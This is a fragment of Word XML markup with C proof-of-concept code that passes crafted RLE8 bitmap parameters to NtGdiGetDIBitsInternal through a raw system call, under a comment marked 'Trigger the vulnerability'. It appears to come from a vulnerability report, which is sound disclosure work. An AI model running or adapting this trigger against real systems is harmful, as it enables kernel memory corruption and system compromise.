          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidR="00937369">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00937369" w:rsidRPr="00937369">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// A handle to a device context (DC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670736B9" w14:textId="6B995895" w:rsidR="00C36C17" w:rsidRPr="00937369" w:rsidRDefault="00C36C17" w:rsidP="00C36C17">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HBITMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hbmp = (</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HBITMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadImage</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L"test.bmp"</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMAGE_BITMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0, 0, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LR_LOADFROMFILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidR="00937369">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00937369" w:rsidRPr="00937369">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Loads an icon, cursor, animated cursor, or bitmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACB3C96" w14:textId="77777777" w:rsidR="00C36C17" w:rsidRPr="00937369" w:rsidRDefault="00C36C17" w:rsidP="00C36C17">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E0171F"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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(hdc != </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE39E76"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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(hbmp != </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1342D011"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534D351" w14:textId="42F3ECF9" w:rsidR="00C36C17" w:rsidRPr="00937369" w:rsidRDefault="00C36C17" w:rsidP="00C36C17">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  SelectObject(hdc, hbmp);</w:t>
      </w:r>
      <w:r w:rsidR="00937369">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00937369" w:rsidRPr="00937369">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// The SelectObject function selects an object into the specified device context (DC). The new object replaces the previous object of the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E4B563"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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Allocate a 4-byte buffer for the output data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0F5F0D" w14:textId="17C6EF61" w:rsidR="00C36C17" w:rsidRPr="00776930" w:rsidRDefault="00C36C17" w:rsidP="00C36C17">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPBYTE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lpNewRegion = (</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPBYTE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)VirtualAlloc(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0x1000, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MEM_COMMIT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MEM_RESERVE</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PAGE_READWRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidR="00776930">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00776930" w:rsidRPr="00776930">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Reserves, commits, or changes the state of a region of pages in the virtual address space of the calling process. Memory allocated by this function is automatically initialized to zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BE1F28"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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(lpNewRegion != </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BF1F92"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memset(lpNewRegion, 0xcc, 0x1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2AE66D"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPBYTE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> output_buffer = &amp;lpNewRegion[0xffc];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC87C2"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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Trigger the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0280E988"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BITMAPINFOHEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bmi = { </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BITMAPINFOHEADER</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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268BC7E5"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100,                      </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biWidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B806C97"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100,                      </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biHeight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D2C9E0"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1,                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biPlanes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79977B3A"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8,                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biBitcount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435F4CA4"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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BI_RLE8</w:t>
      </w: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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biCompression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C110F"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0x10000000,               </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biSizeImage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF75259"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0,                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biXPelsPerMeter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1F21BB"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0,                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biYPelsPerMeter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DF772"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0,                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biClrUsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEABB8F"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0,                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// biClrImportant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A538F"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p>
    <w:p w14:paraId="54D48378"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7C4695C"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SystemCall32(__NR_NtGdiGetDIBitsInternal,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450AD54C"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hdc,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA5AD95"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hbmp,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E011954"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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B356A14"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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3374CE"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output_buffer,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1014E046"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&amp;bmi,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BECA451" w14:textId="77777777" w:rsidR="00C36C17" w:rsidRP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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DIB_RGB_COLORS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10686476" w14:textId="77777777" w:rsid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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE2BCB7" w14:textId="77777777" w:rsid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sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(bmi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E74A7" w14:textId="77777777" w:rsid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6EE2C8E" w14:textId="77777777" w:rsid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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
